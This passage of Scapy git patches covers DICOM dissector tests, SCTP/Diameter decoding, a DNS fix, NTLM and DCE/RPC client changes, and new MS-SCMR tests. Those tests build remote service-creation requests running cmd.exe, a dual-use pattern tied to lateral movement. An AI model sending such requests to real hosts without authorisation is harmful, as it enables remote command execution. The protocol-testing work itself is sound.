P_DATA_TF(pdv_items=[pdv1, pdv2]) +raw = bytes(pkt) +assert raw[0] == 0x04 +assert len(raw) > 6 + += P-DATA-TF round-trip - build and verify structure +test_data = b"\x01\x02\x03\x04\x05" +pdv = PresentationDataValueItem(context_id=3, data=test_data, is_command=1, is_last=1) +original = DICOM() / P_DATA_TF(pdv_items=[pdv]) +serialized = bytes(original) +assert serialized[0] == 0x04 +length = struct.unpack("!I", serialized[2:6])[0] +assert length > 0 +assert test_data in serialized + += PDV is_command flag encoding +pdv = PresentationDataValueItem(context_id=1, data=b'x', is_command=1, is_last=0) +raw = bytes(pdv) +msg_ctrl = raw[5] +assert msg_ctrl & 0x01 == 1 +assert msg_ctrl & 0x02 == 0 + += PDV is_last flag encoding +pdv = PresentationDataValueItem(context_id=1, data=b'x', is_command=0, is_last=1) +raw = bytes(pdv) +msg_ctrl = raw[5] +assert msg_ctrl & 0x01 == 0 +assert msg_ctrl & 0x02 == 2 + += PDV both flags set +pdv = PresentationDataValueItem(context_id=1, data=b'x', is_command=1, is_last=1) +raw = bytes(pdv) +msg_ctrl = raw[5] +assert msg_ctrl == 0x03 + += PDV flags encoding verification +for is_cmd in [0, 1]: + for is_last in [0, 1]: + pdv = PresentationDataValueItem(context_id=1, data=b'test', is_command=is_cmd, is_last=is_last) + raw = bytes(pdv) + msg_ctrl = raw[5] + assert (msg_ctrl & 0x01) == is_cmd + assert (msg_ctrl & 0x02) == (is_last << 1) + +############ +############ ++ DIMSE packet tests + += C_ECHO_RQ creation with defaults +pkt = C_ECHO_RQ() +raw = bytes(pkt) +assert raw[:4] == b'\x00\x00\x00\x00' +assert b'1.2.840.10008.1.1' in raw + += C_ECHO_RQ custom message_id +pkt = C_ECHO_RQ(message_id=12345) +raw = bytes(pkt) +assert b'\x10\x01' in raw +assert struct.pack("= 1 +assert sub_items[0].item_type == 0x51 +assert sub_items[0][DICOMMaximumLength].max_pdu_length == 32768 + += build_user_information with implementation info +user_info = build_user_information( + max_pdu_length=16384, + implementation_class_uid="1.2.3.4.5", + implementation_version="SCAPY_V1" +) +sub_items = user_info[DICOMUserInformation].sub_items +assert len(sub_items) == 3 +types = [item.item_type for item in sub_items] +assert 0x51 in types +assert 0x52 in types +assert 0x55 in types + += _uid_to_bytes pads odd-length UIDs +assert len(_uid_to_bytes("1.2.3")) % 2 == 0 +assert _uid_to_bytes("1.2.3.4") == b"1.2.3.4\x00" +assert _uid_to_bytes("1.2.3") == b"1.2.3\x00" + +############ +############ ++ User Identity Negotiation tests + += User Identity username only (type 1) +pkt = DICOMVariableItem() / DICOMUserIdentity( + user_identity_type=1, + positive_response_requested=0, + primary_field=b"admin" +) +assert pkt.item_type == 0x58 +raw = bytes(pkt) +parsed = DICOMVariableItem(raw) +assert parsed.haslayer(DICOMUserIdentity) +assert parsed[DICOMUserIdentity].user_identity_type == 1 +assert parsed[DICOMUserIdentity].primary_field == b"admin" + += User Identity username+password (type 2) +pkt = DICOMVariableItem() / DICOMUserIdentity( + user_identity_type=2, + positive_response_requested=1, + primary_field=b"admin", + secondary_field=b"password123" +) +raw = bytes(pkt) +parsed = DICOMVariableItem(raw) +assert parsed.haslayer(DICOMUserIdentity) +assert parsed[DICOMUserIdentity].user_identity_type == 2 +assert parsed[DICOMUserIdentity].primary_field == b"admin" +assert parsed[DICOMUserIdentity].secondary_field == b"password123" + += User Identity Response +pkt = DICOMVariableItem() / DICOMUserIdentityResponse( + server_response=b"auth_token_12345" +) +assert pkt.item_type == 0x59 +raw = bytes(pkt) +parsed = DICOMVariableItem(raw) +assert parsed.haslayer(DICOMUserIdentityResponse) +assert parsed[DICOMUserIdentityResponse].server_response == b"auth_token_12345" + +############ +############ ++ Async Operations Window tests + += Async operations default values +pkt = DICOMVariableItem() / DICOMAsyncOperationsWindow() +assert pkt.item_type == 0x53 +raw = bytes(pkt) +parsed = DICOMVariableItem(raw) +assert parsed.haslayer(DICOMAsyncOperationsWindow) +assert parsed[DICOMAsyncOperationsWindow].max_ops_invoked == 1 +assert parsed[DICOMAsyncOperationsWindow].max_ops_performed == 1 + += Async operations custom values +pkt = DICOMVariableItem() / DICOMAsyncOperationsWindow( + max_ops_invoked=8, + max_ops_performed=4 +) +raw = bytes(pkt) +parsed = DICOMVariableItem(raw) +assert parsed[DICOMAsyncOperationsWindow].max_ops_invoked == 8 +assert parsed[DICOMAsyncOperationsWindow].max_ops_performed == 4 + +############ +############ ++ SCP/SCU Role Selection tests + += Role Selection SCU only +pkt = DICOMVariableItem() / DICOMSCPSCURoleSelection( + sop_class_uid=b"1.2.840.10008.5.1.4.1.1.2", + scu_role=1, + scp_role=0 +) +assert pkt.item_type == 0x54 +raw = bytes(pkt) +parsed = DICOMVariableItem(raw) +assert parsed.haslayer(DICOMSCPSCURoleSelection) +assert parsed[DICOMSCPSCURoleSelection].sop_class_uid == b"1.2.840.10008.5.1.4.1.1.2" +assert parsed[DICOMSCPSCURoleSelection].scu_role == 1 +assert parsed[DICOMSCPSCURoleSelection].scp_role == 0 + +############ +############ ++ DICOM extract_padding for StreamSocket + += DICOM extract_padding method exists +pkt = DICOM() +assert hasattr(pkt, 'extract_padding') + += DICOM extract_padding separates payload from trailing data +pkt = DICOM() +pkt.length = 10 +payload, remaining = pkt.extract_padding(b'0123456789EXTRA') +assert payload == b'0123456789' +assert remaining == b'EXTRA' + +############ +############ ++ TCP layer binding + += DICOM binds to TCP port 104 +from scapy.layers.inet import TCP +pkt = TCP(dport=104) / b'\x01\x00\x00\x00\x00\x04' +assert DICOM in pkt or pkt.payload + +############ +############ ++ Edge cases + += Empty variable items list +pkt = DICOM() / A_ASSOCIATE_RQ(variable_items=[]) +serialized = bytes(pkt) +parsed = DICOM(serialized) +assert parsed.haslayer(A_ASSOCIATE_RQ) + += Empty PDV items list +pkt = DICOM() / P_DATA_TF(pdv_items=[]) +serialized = bytes(pkt) +assert len(serialized) == 6 From a686d238ca7674e8eb00f9883f4d71b56f2f4194 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 11 Feb 2026 18:24:36 +0100 Subject: [PATCH 1583/1632] Attempt to decode SCTPChunkData data when possible Removed exception handling around SCTP packet creation. --- scapy/contrib/diameter.py | 2 -- scapy/layers/sctp.py | 21 ++++++++++++++++++++- test/contrib/diameter.uts | 30 ++++++++++++++++++++++++++++++ test/scapy/layers/sctp.uts | 2 +- 4 files changed, 51 insertions(+), 4 deletions(-) diff --git a/scapy/contrib/diameter.py b/scapy/contrib/diameter.py index b5110709e08..7bd74e28245 100644 --- a/scapy/contrib/diameter.py +++ b/scapy/contrib/diameter.py @@ -4828,7 +4828,5 @@ def DiamAns(cmd, **fields): bind_layers(TCP, DiamG, dport=3868) bind_layers(TCP, DiamG, sport=3868) -bind_layers(SCTPChunkData, DiamG, dport=3868) -bind_layers(SCTPChunkData, DiamG, sport=3868) bind_layers(SCTPChunkData, DiamG, proto_id=46) bind_layers(SCTPChunkData, DiamG, proto_id=47) diff --git a/scapy/layers/sctp.py b/scapy/layers/sctp.py index 649ca59aa29..9e6c6049d46 100644 --- a/scapy/layers/sctp.py +++ b/scapy/layers/sctp.py @@ -24,6 +24,7 @@ IntEnumField, IntField, MultipleTypeField, + PacketLenField, PacketListField, PadField, ShortEnumField, @@ -624,6 +625,23 @@ class SCTPChunkParamAdaptationLayer(_SCTPChunkParam, Packet): } +class _SCTPChunkDataField(PacketLenField): + """PacketLenField that dispatches using bind_layers bindings.""" + + def m2i(self, pkt, m): + # Only dissect complete messages + if pkt.beginning != 1 or pkt.ending != 1: + return conf.raw_layer(load=m) + # Check bind_layers bindings + for fval, cls in pkt.payload_guess: + if all( + hasattr(pkt, k) and v == pkt.getfieldval(k) + for k, v in fval.items() + ): + return cls(m) + return conf.raw_layer(load=m) + + class SCTPChunkData(_SCTPChunkGuessPayload, Packet): # TODO : add a padding function in post build if this layer is used to generate SCTP chunk data # noqa: E501 fields_desc = [ByteEnumField("type", 0, sctpchunktypes), @@ -637,7 +655,8 @@ class SCTPChunkData(_SCTPChunkGuessPayload, Packet): XShortField("stream_id", None), XShortField("stream_seq", None), IntEnumField("proto_id", None, SCTP_PAYLOAD_PROTOCOL_INDENTIFIERS), # noqa: E501 - PadField(StrLenField("data", None, length_from=lambda pkt: pkt.len - 16), # noqa: E501 + PadField(_SCTPChunkDataField("data", None, conf.raw_layer, + length_from=lambda pkt: pkt.len - 16), # noqa: E501 4, padwith=b"\x00"), ] diff --git a/test/contrib/diameter.uts b/test/contrib/diameter.uts index e06a055a16d..2f1ce7d6f0e 100644 --- a/test/contrib/diameter.uts +++ b/test/contrib/diameter.uts @@ -253,3 +253,33 @@ r3b = DiamReq ('Multimedia-Auth', drHbHId=0x5478, drEtEId=0x1234, raw(r3b) == raw(r3) + +####################################################################### ++ Diameter over SCTP +####################################################################### + += Diameter decoded from SCTPChunkData via proto_id binding + +from scapy.layers.sctp import SCTP, SCTPChunkData + +diam_pkt = DiamAns('Capabilities-Exchange', drHbHId=0x1234, drEtEId=0x5678, + avpList=[AVP('Origin-Host', val='host.example.com'), + AVP('Origin-Realm', val='example.com')]) + +pkt = SCTP(raw(SCTP() / SCTPChunkData(proto_id=46, beginning=1, ending=1, data=raw(diam_pkt)))) +chunk = pkt[SCTPChunkData] +assert isinstance(chunk.data, DiamG) +assert chunk.proto_id == 46 +assert chunk.data.drHbHId == 0x1234 +assert chunk.data.avpList[0].avpCode == 264 + += SCTPChunkData with unknown proto_id keeps raw bytes + +pkt = SCTP(raw(SCTP() / SCTPChunkData(proto_id=0, data=b"test"))) +assert raw(pkt[SCTPChunkData].data) == b"test" + += SCTPChunkData fragment is not decoded + +pkt = SCTP(raw(SCTP() / SCTPChunkData(proto_id=46, beginning=1, ending=0, data=raw(diam_pkt)))) +assert not isinstance(pkt[SCTPChunkData].data, DiamG) + diff --git a/test/scapy/layers/sctp.uts b/test/scapy/layers/sctp.uts index da7914d8b94..c1ced26967a 100644 --- a/test/scapy/layers/sctp.uts +++ b/test/scapy/layers/sctp.uts @@ -49,7 +49,7 @@ assert p.tsn == 0 assert p.stream_id == 0 assert p.stream_seq == 0 assert p.len == (len("data") + 16) -assert p.data == b"data" +assert raw(p.data) == b"data" = basic SCTPChunkIData - Dissection ~ sctp From 2c787cd2c72890c9e21ff205a15b12b5f5fc1027 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sat, 21 Feb 2026 00:11:55 +0300 Subject: [PATCH 1584/1632] ci: actually run the tests on Packit again (#4927) * ci: actually run the tests on Packit again The Fedora package added the "%check" section to the spec file to perform an import check in https://src.fedoraproject.org/rpms/scapy/c/878585466261f17c01516a653d19cf47022c2f9f?branch=rawhide and it broke the upstream script where sed expected the "%check" section to be commented out. This patch adjusts the sed command to run the tests again. * ci: turn off netaccess on Packit for now Currently those tests sporadically time out in some Packit jobs. They can probably be brought back once Packit is stabilized. --- .packit.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.packit.yml b/.packit.yml index 55c09aff689..d2594ce22be 100644 --- a/.packit.yml +++ b/.packit.yml @@ -17,7 +17,7 @@ actions: - "git clone https://src.fedoraproject.org/rpms/scapy .packit_rpm --depth=1" # Drop the "sources" file so rebase-helper doesn't think we're a dist-git - "rm -fv .packit_rpm/sources" - - "sed -i '/^# check$/a%check\\nOPENSSL_ENABLE_SHA1_SIGNATURES=1 OPENSSL_CONF=$(python3 ./.config/ci/openssl.py) ./test/run_tests -c test/configs/linux.utsc -K ci_only -K scanner' .packit_rpm/scapy.spec" + - "sed -i '/^%check$/aOPENSSL_ENABLE_SHA1_SIGNATURES=1 OPENSSL_CONF=$(python3 ./.config/ci/openssl.py) ./test/run_tests -c test/configs/linux.utsc -K ci_only -K netaccess -K scanner' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: can-utils' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: libpcap' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: openssl' .packit_rpm/scapy.spec" From dfc11c8d83c5f2922cb5e33c620785933fcf007e Mon Sep 17 00:00:00 2001 From: wenxuan70 Date: Sun, 15 Feb 2026 22:22:46 +0800 Subject: [PATCH 1585/1632] Fix ClientSubnetv4 Calculates Address Length Incorrectly issue --- scapy/layers/dns.py | 2 +- test/scapy/layers/dns.uts | 4 ++++ 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 21e8bb79045..3177ee38186 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -546,7 +546,7 @@ class ClientSubnetv4(StrLenField): def getfield(self, pkt, s): # type: (Packet, bytes) -> Tuple[bytes, I] - sz = operator.floordiv(self.length_from(pkt), 8) + sz = operator.floordiv(self.length_from(pkt) + 7, 8) sz = min(sz, operator.floordiv(self.af_length, 8)) return s[sz:], self.m2i(pkt, s[:sz]) diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index 6496d6e4a82..d0beb222edf 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -516,3 +516,7 @@ assert p == eval(p.command()) pkt = DNSQR(qname=["domain1.com", "domain2.com"], qtype="A") for i in pkt: assert i.qname in [b"domain1.com.", b"domain2.com."] + +b = b'\x00\x08\x00\x0c\x00\x02=\x00+\xaf\xa3\xc4\xed\xeeW\xb8' +p = EDNS0ClientSubnet(b) +assert p.source_plen == 61 and p.address == '2baf:a3c4:edee:57b8::' From d7d8b8d9075d3b42209e89aa7eaa1d2dde29dc5d Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 15 Feb 2026 15:15:33 +0100 Subject: [PATCH 1586/1632] Test more things from scapy-rpc --- test/configs/bsd.utsc | 1 + test/configs/linux.utsc | 1 + test/configs/windows.utsc | 1 + test/configs/windows2.utsc | 1 + test/scapy/layers/msrpce/mslsad.uts | 3 - test/scapy/layers/msrpce/msscmr.uts | 121 ++++++++++++++++++++++++++++ 6 files changed, 125 insertions(+), 3 deletions(-) create mode 100644 test/scapy/layers/msrpce/msscmr.uts diff --git a/test/configs/bsd.utsc b/test/configs/bsd.utsc index 583a27cc0ef..194466f989f 100644 --- a/test/configs/bsd.utsc +++ b/test/configs/bsd.utsc @@ -23,6 +23,7 @@ "test/contrib/isotp_soft_socket.uts" ], "onlyfailed": true, + "extensions": ["scapy-rpc"], "preexec": { "test/contrib/*.uts": "load_contrib(\"%name%\")", "test/cert.uts": "load_layer(\"tls\")", diff --git a/test/configs/linux.utsc b/test/configs/linux.utsc index 7972e1e8739..b26e9166c85 100644 --- a/test/configs/linux.utsc +++ b/test/configs/linux.utsc @@ -20,6 +20,7 @@ ], "breakfailed": true, "onlyfailed": true, + "extensions": ["scapy-rpc"], "preexec": { "test/contrib/*.uts": "load_contrib(\"%name%\")", "test/scapy/layers/tls/*.uts": "load_layer(\"tls\")" diff --git a/test/configs/windows.utsc b/test/configs/windows.utsc index 2e015eb24e9..a38f065e8ca 100644 --- a/test/configs/windows.utsc +++ b/test/configs/windows.utsc @@ -19,6 +19,7 @@ ], "breakfailed": true, "onlyfailed": true, + "extensions": ["scapy-rpc"], "preexec": { "test\\contrib\\*.uts": "load_contrib(\"%name%\")", "test\\scapy\\layers\\tls\\*.uts": "load_layer(\"tls\")" diff --git a/test/configs/windows2.utsc b/test/configs/windows2.utsc index de1fe81d9ed..8d284880dd0 100644 --- a/test/configs/windows2.utsc +++ b/test/configs/windows2.utsc @@ -17,6 +17,7 @@ ], "breakfailed": true, "onlyfailed": true, + "extensions": ["scapy-rpc"], "preexec": { "contrib\\*.uts": "load_contrib(\"%name%\")", "scapy\\layers\\tls\\*.uts": "load_layer(\"tls\")" diff --git a/test/scapy/layers/msrpce/mslsad.uts b/test/scapy/layers/msrpce/mslsad.uts index 195f539dd44..1d9099a6cc7 100644 --- a/test/scapy/layers/msrpce/mslsad.uts +++ b/test/scapy/layers/msrpce/mslsad.uts @@ -5,12 +5,10 @@ * This files are stored in the scapy-rpc extension, but included as part of Scapy's main testing suite for consistency. = [MS-LSAD] - Import [MS-LSAD] -~ disabled from scapy.layers.msrpce.raw.ms_lsad import * = [MS-LSAD] - Build LsarEnumerateAccountsWithUserRight_Request -~ disabled policyHandle = NDRContextHandle(attributes=0, uuid=b'\x92\xa1*"\xc2\xc2\nJ\xaf\x0bL\xdd]C\x8c\x1a') right = "SeAuditPrivilege" @@ -25,7 +23,6 @@ pkt = LsarEnumerateAccountsWithUserRight_Request( assert bytes(pkt) == b'\x00\x00\x00\x00\x92\xa1*"\xc2\xc2\nJ\xaf\x0bL\xdd]C\x8c\x1a\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00 \x00 \x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00S\x00e\x00A\x00u\x00d\x00i\x00t\x00P\x00r\x00i\x00v\x00i\x00l\x00e\x00g\x00e\x00' = [MS-LSAD] - Dissect LsarEnumerateAccountsWithUserRight_Response -~ disabled from scapy.layers.smb2 import WINNT_SID diff --git a/test/scapy/layers/msrpce/msscmr.uts b/test/scapy/layers/msrpce/msscmr.uts new file mode 100644 index 00000000000..b925b2ba7d9 --- /dev/null +++ b/test/scapy/layers/msrpce/msscmr.uts @@ -0,0 +1,121 @@ +% MS-SCMR tests + ++ [MS-SCMR] build and dissection tests + +* This files are stored in the scapy-rpc extension, but included as part of Scapy's main testing suite for consistency. + += [MS-SCMR] - Import [MS-SCMR] + +from scapy.layers.msrpce.raw.ms_scmr import * + += [MS-SCMR] - Dissect ROpenServiceW_Request + +DATA = bytes.fromhex('00000000053914c3f0543646af7317818dbee820160000000000000016000000530065006300750072006900740079004800650061006c00740068005300650072007600690063006500000005000000') + +pkt = ROpenServiceW_Request(DATA, ndr64=False) +assert pkt.valueof("lpServiceName") == b"SecurityHealthService" +assert pkt.hSCManager.uuid == b'\x059\x14\xc3\xf0T6F\xafs\x17\x81\x8d\xbe\xe8 ' + += [MS-SCMR] - Re-Build ROpenServiceW_Request + +pkt = ROpenServiceW_Request( + hSCManager=NDRContextHandle(uuid=b'\x059\x14\xc3\xf0T6F\xafs\x17\x81\x8d\xbe\xe8 '), + lpServiceName=b"SecurityHealthService", + dwDesiredAccess=5, + ndr64=False, +) +assert bytes(pkt) == DATA + += [MS-SCMR] - Dissect RQueryServiceConfigW_Request + +DATA = bytes.fromhex('00000000d76d93463d7e9047856bbc0839ef836910100000') + +pkt = RQueryServiceConfigW_Request(DATA, ndr64=False) +assert pkt.cbBufSize == 4112 + += [MS-SCMR] - Dissect RQueryServiceConfig2W_Request + +DATA = bytes.fromhex('00000000d76d93463d7e9047856bbc0839ef83690100000010100000') + +pkt = RQueryServiceConfig2W_Request(DATA, ndr64=False) +assert pkt.dwInfoLevel == 1 +assert pkt.cbBufSize == 4112 + += [MS-SCMR] - Dissect RQueryServiceConfig2W_Response + +import zlib +DATA = zlib.decompress(bytes.fromhex('789ced8f4b0ec2300c05078903e408d9711d368875092d204a8b4805d7e7a5286c10127bde5876fc89ed240458026b6e8cdc39b1a72513e968488a7be924add9513723175507e941954136b261ab2951b9ab24cf5e9294be124deaacd5a87cf11a761f1b9ad93e14f5921a278eca24ceef7d657f9db7faba2fabdaceffe8a4e9871718638c31c618638c31ff4158bcce27d9e630e0')) + +pkt = RQueryServiceConfig2W_Response(DATA, ndr64=False, request_packet=pkt) +assert pkt.lpBuffer.max_count == 4112 +assert pkt.pcbBytesNeeded == 272 +assert pkt.status == 0 +assert pkt.lpBuffer.value[4:].decode("utf-16le").rstrip("\x00") == "Provides facilities for managing UWP apps access to app capabilities as well as checking an app's access to specific app capabilities" + += [MS-SCMR] - Dissect RQueryServiceConfigW_Response + +DATA = bytes.fromhex('200000000200000001000000000002000400020000000000080002000c0002001000020030000000000000003000000043003a005c00570049004e0044004f00570053005c00730079007300740065006d00330032005c0073007600630068006f00730074002e0065007800650020002d006b0020006f007300700072006900760061006300790020002d0070000000010000000000000001000000000000002e000000000000002e000000720070006300730073002f00730074006100740065007200650070006f007300690074006f00720079002f0043006f00720065004d006500730073006100670069006e0067005200650067006900730074007200610072002f0000000c000000000000000c0000004c006f00630061006c00530079007300740065006d0000002200000000000000220000004300610070006100620069006c00690074007900200041006300630065007300730020004d0061006e0061006700650072002000530065007200760069006300650000007e01000000000000') +pkt = RQueryServiceConfigW_Response(DATA, ndr64=False) +assert pkt.status == 0 +assert pkt.pcbBytesNeeded == 389 +assert pkt.lpServiceConfig.dwServiceType == 32 +assert pkt.lpServiceConfig.dwErrorControl == 1 +assert pkt.lpServiceConfig.valueof("lpBinaryPathName") == b'C:\\WINDOWS\\system32\\svchost.exe -k osprivacy -p' +assert pkt.lpServiceConfig.valueof("lpDependencies") == b'rpcss/staterepository/CoreMessagingRegistrar/' +assert pkt.lpServiceConfig.valueof("lpDisplayName") == b'Capability Access Manager Service' + += [MS-SCMR] - Dissect RCreateServiceW_Request + +DATA = bytes.fromhex('00000000dea1de2e22144844a5f5ea3948e8add905000000000000000500000074006500730074000000000000000000ff010f001000000003000000010000001c000000000000001c00000043003a005c00570069006e0064006f00770073005c00530079007300740065006d00330032005c0063006d0064002e00650078006500000000000000000000000000000000000000000000000000000000000000') +pkt = RCreateServiceW_Request(DATA, ndr64=False) +assert pkt.valueof("lpServiceName") == b"test" +assert pkt.dwDesiredAccess == 983551 +assert pkt.dwStartType == 3 +assert pkt.dwServiceType == 16 +assert pkt.dwErrorControl == 1 +assert pkt.valueof("lpBinaryPathName") == b"C:\\Windows\\System32\\cmd.exe" +assert pkt.lpDisplayName is None +assert pkt.dwPwSize == 0 + += [MS-SCMR] - Re-Build RCreateServiceW_Request + +pkt = RCreateServiceW_Request( + hSCManager=NDRContextHandle(uuid=b'\xde\xa1\xde."\x14HD\xa5\xf5\xea9H\xe8\xad\xd9'), + lpServiceName=b"test", + dwDesiredAccess=983551, + dwServiceType=16, + dwStartType=3, + dwErrorControl=1, + lpBinaryPathName=b"C:\\Windows\\System32\\cmd.exe", + ndr64=False, +) +assert bytes(pkt) == DATA + += [MS-SCMR] - Dissect RCreateServiceW_Request - with lpDisplayName + +DATA = bytes.fromhex('00000000dcf903ed9e7b604ca9971ce8d0938b2405000000000000000500000074006500730074000000000000000200050000000000000005000000740065007300740000000000ff010f001000000003000000010000001c000000000000001c00000043003a005c00570069006e0064006f00770073005c00530079007300740065006d00330032005c0063006d0064002e00650078006500000000000000000000000000000000000000000000000000000000000000') +pkt = RCreateServiceW_Request(DATA, ndr64=False) +assert pkt.valueof("lpServiceName") == b"test" +assert pkt.dwDesiredAccess == 983551 +assert pkt.dwStartType == 3 +assert pkt.dwServiceType == 16 +assert pkt.dwErrorControl == 1 +assert pkt.valueof("lpBinaryPathName") == b"C:\\Windows\\System32\\cmd.exe" +assert pkt.lpDisplayName.referent_id == 0x20000 +assert pkt.valueof("lpDisplayName") == b"test" +assert pkt.dwPwSize == 0 + += [MS-SCMR] - Build RCreateServiceW_Request - with lpDisplayName + +pkt = RCreateServiceW_Request( + hSCManager=NDRContextHandle(uuid=b'\xdc\xf9\x03\xed\x9e{`L\xa9\x97\x1c\xe8\xd0\x93\x8b$'), + lpServiceName=b"test", + lpDisplayName=b"test", + dwDesiredAccess=983551, + dwServiceType=16, + dwStartType=3, + dwErrorControl=1, + lpBinaryPathName=b"C:\\Windows\\System32\\cmd.exe", + ndr64=False, +) +assert bytes(pkt) == DATA From ffd9d1c2cab136cf612ea22fb4ba85b75d521f0b Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 15 Feb 2026 15:16:06 +0100 Subject: [PATCH 1587/1632] smbclient: Fix glob support in put --- scapy/layers/smbclient.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index d143cd29a01..0eebcb70fd1 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -1732,7 +1732,7 @@ def cat_complete(self, file): return [] return self._fs_complete(file) - @CLIUtil.addcommand(spaces=True) + @CLIUtil.addcommand(spaces=True, globsupport=True) def put(self, file): """ Upload a file From cdf3e34a9570ec6f21365d3d9d583c4b0106440c Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 15 Feb 2026 15:16:47 +0100 Subject: [PATCH 1588/1632] NTLM: check user case insensitively --- scapy/layers/ntlm.py | 22 +++++++++++++++++----- 1 file changed, 17 insertions(+), 5 deletions(-) diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 60258eb6be4..4e0d956be72 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -1416,7 +1416,15 @@ def __init__( self.COMPUTER_NB_NAME.lower() + "." + self.DOMAIN_FQDN ) - self.IDENTITIES = IDENTITIES + if IDENTITIES: + self.IDENTITIES = { + # Windows usernames are case insensitive + user.upper(): hashnt + for user, hashnt in IDENTITIES.items() + } + else: + self.IDENTITIES = IDENTITIES + self.DO_NOT_CHECK_LOGIN = DO_NOT_CHECK_LOGIN self.SERVER_CHALLENGE = SERVER_CHALLENGE super(NTLMSSP, self).__init__(**kwargs) @@ -1681,7 +1689,10 @@ def GSS_Init_sec_context( + [ AV_PAIR( AvId="MsvAvSingleHost", - Value=Single_Host_Data(MachineID=os.urandom(32)), + Value=Single_Host_Data( + MachineID=os.urandom(32), + PermanentMachineID=os.urandom(32), + ), ), ] + ( @@ -2048,7 +2059,8 @@ def _getSessionBaseKey(self, Context, auth_tok): Function that returns the SessionBaseKey from the ntlm Authenticate. """ try: - username = auth_tok.UserName + # Windows usernames are case insensitive + username = auth_tok.UserName.upper() except AttributeError: username = None try: @@ -2076,9 +2088,9 @@ def _checkLogin(self, Context, auth_tok): Overwrite and return True to bypass. """ - # Create the NTLM AUTH try: - username = auth_tok.UserName + # Windows usernames are case insensitive + username = auth_tok.UserName.upper() except AttributeError: username = None try: From 2fcec29a8772541ffaa74cc6f0c1fa9fb9d9a283 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 15 Feb 2026 15:17:16 +0100 Subject: [PATCH 1589/1632] DCE/RPC client: improve endpoint mapper resilliency - close properly when it crashes - fix over SMB where the pipe was open too soon --- scapy/layers/msrpce/rpcclient.py | 34 ++++++++++++++++++++------------ 1 file changed, 21 insertions(+), 13 deletions(-) diff --git a/scapy/layers/msrpce/rpcclient.py b/scapy/layers/msrpce/rpcclient.py index 8afe70ad55e..b8d227be17d 100644 --- a/scapy/layers/msrpce/rpcclient.py +++ b/scapy/layers/msrpce/rpcclient.py @@ -197,6 +197,7 @@ def connect( transport=self.transport, ndrendian=self.ndrendian, verb=self.verb, + ssp=self.ssp, smb_kwargs=smb_kwargs, ) if endpoints: @@ -234,14 +235,15 @@ def connect( ) if self.transport == DCERPC_Transport.NCACN_NP: # SMB - # If the endpoint is provided, connect to it. - if endpoint is not None: - self.open_smbpipe(endpoint) - # We pack the socket into a SMB_RPC_SOCKET sock = self.smbrpcsock = SMB_RPC_SOCKET.from_tcpsock( sock, ssp=self.ssp, **smb_kwargs ) + + # If the endpoint is provided, connect to it. + if endpoint is not None: + self.open_smbpipe(endpoint) + self.sock = DceRpcSocket(sock, DceRpc5, **self.dcesockargs) elif self.transport == DCERPC_Transport.NCACN_IP_TCP: self.sock = DceRpcSocket( @@ -351,6 +353,9 @@ def sr1_req(self, pkt, **kwargs): if "opnum" in kwargs: opnum["opnum"] = kwargs.pop("opnum") + # Set NDR64 + pkt.ndr64 = self.ndr64 + # Send/receive resp = self.sr1( DceRpc5Request( @@ -486,7 +491,10 @@ def _check_bind_context(self, interface, contexts) -> bool: return False def _bind( - self, interface: Union[DceRpcInterface, ComInterface], reqcls, respcls + self, + interface: Union[DceRpcInterface, ComInterface], + reqcls, + respcls, ) -> bool: """ Internal: used to send a bind/alter request @@ -681,11 +689,10 @@ def _bind( else: print(conf.color_theme.fail("! Failure")) resp.show() - if DceRpc5Fault in resp: - if resp[DceRpc5Fault].payload and not isinstance( - resp[DceRpc5Fault].payload, conf.raw_layer - ): - resp[DceRpc5Fault].payload.show() + if resp[DceRpc5Fault].payload and not isinstance( + resp[DceRpc5Fault].payload, conf.raw_layer + ): + resp[DceRpc5Fault].payload.show() else: print(conf.color_theme.fail("! Failure")) resp.show() @@ -900,7 +907,6 @@ def epm_map(self, interface): return endpoints elif status == 0x16C9A0D6: if self.verb: - pkt.show() print( conf.color_theme.fail( "! Server errored: 'There are no elements that satisfy" @@ -953,7 +959,9 @@ def get_endpoint( client.connect(ip, endpoint=endpoint, smb_kwargs=smb_kwargs) client.bind(find_dcerpc_interface("ept")) - endpoints = client.epm_map(interface) + try: + endpoints = client.epm_map(interface) + finally: + client.close() - client.close() return endpoints From 32bd92f794f401999ada0a9e9d02c8c23449a4d6 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 15 Feb 2026 22:18:07 +0100 Subject: [PATCH 1590/1632] Fix explore() with plugins --- scapy/config.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/scapy/config.py b/scapy/config.py index 3c5f05cf49b..95c4a419e99 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -314,7 +314,10 @@ def layers(self): except ImportError: import __builtin__ # noqa: F401 for lay in self.ldict: - doc = eval(lay).__doc__ + try: + doc = eval(lay).__doc__ + except 